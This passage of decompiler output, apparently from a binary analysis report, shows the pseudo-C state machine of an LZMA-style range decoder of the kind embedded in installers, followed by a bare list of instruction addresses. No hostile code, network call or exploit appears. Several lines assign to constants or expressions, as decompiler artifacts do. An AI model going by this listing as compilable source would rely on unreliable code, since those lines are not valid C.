												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                0x00000000
                                                                0x0040680a
                                                                0x0040680a
                                                                0x0040680e
                                                                0x00406833
                                                                0x0040683d
                                                                0x00000000
                                                                0x00406810
                                                                0x00406810
                                                                0x00406813
                                                                0x00406817
                                                                0x0040681a
                                                                0x0040681d
                                                                0x00406821
                                                                0x00406821
                                                                0x00406824
                                                                0x004068fe
                                                                0x004068fe
                                                                0x00406905
                                                                0x00406905
                                                                0x00406908
                                                                0x0040690f
                                                                0x0040693c
                                                                0x00406940
                                                                0x004069a0
                                                                0x004069a3
                                                                0x004069a8
                                                                0x004069a9
                                                                0x004069ab
                                                                0x004069ad
                                                                0x004069b0
                                                                0x004068bc
                                                                0x004068bc
                                                                0x004068bc
                                                                0x00406058
                                                                0x00406058
                                                                0x00406058
                                                                0x00406061
                                                                0x00000000
                                                                0x00000000
                                                                0x00406067
                                                                0x00000000
                                                                0x00406072
                                                                0x00000000
                                                                0x00000000
                                                                0x0040607b
                                                                0x0040607e
                                                                0x00406081
                                                                0x00406085
                                                                0x00000000
                                                                0x00000000
                                                                0x0040608b
                                                                0x0040608e
                                                                0x00406090
                                                                0x00406091
                                                                0x00406094
                                                                0x00406096
                                                                0x00406097
                                                                0x00406099
                                                                0x0040609c
                                                                0x004060a1
                                                                0x004060a6
                                                                0x004060af
                                                                0x004060c2
                                                                0x004060c5
                                                                0x004060d1
                                                                0x004060f9
                                                                0x004060fb
                                                                0x00406109
                                                                0x00406109
                                                                0x0040610d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004060fd
                                                                0x004060fd
                                                                0x00406100
                                                                0x00406101
                                                                0x00406101
                                                                0x00000000
                                                                0x004060fd
                                                                0x004060d7
                                                                0x004060dc
                                                                0x004060dc
                                                                0x004060e5
                                                                0x004060ed
                                                                0x004060f0
                                                                0x00000000
                                                                0x004060f6
                                                                0x004060f6
                                                                0x00000000
                                                                0x004060f6
                                                                0x00000000
                                                                0x00406113
                                                                0x00406113
                                                                0x00406117
                                                                0x004069c3
                                                                0x00000000
                                                                0x004069c3
                                                                0x00406120
                                                                0x00406130
                                                                0x00406133
                                                                0x00406136
                                                                0x00406136
                                                                0x00406136
                                                                0x00406139
                                                                0x0040613d
                                                                0x00000000
                                                                0x00000000
                                                                0x0040613f
                                                                0x00406145
                                                                0x0040616f
                                                                0x00406175
                                                                0x0040617c
                                                                0x00000000
                                                                0x0040617c
                                                                0x0040614b
                                                                0x0040614e
                                                                0x00406153
                                                                0x00406153
                                                                0x0040615e
                                                                0x00406166
                                                                0x00406169
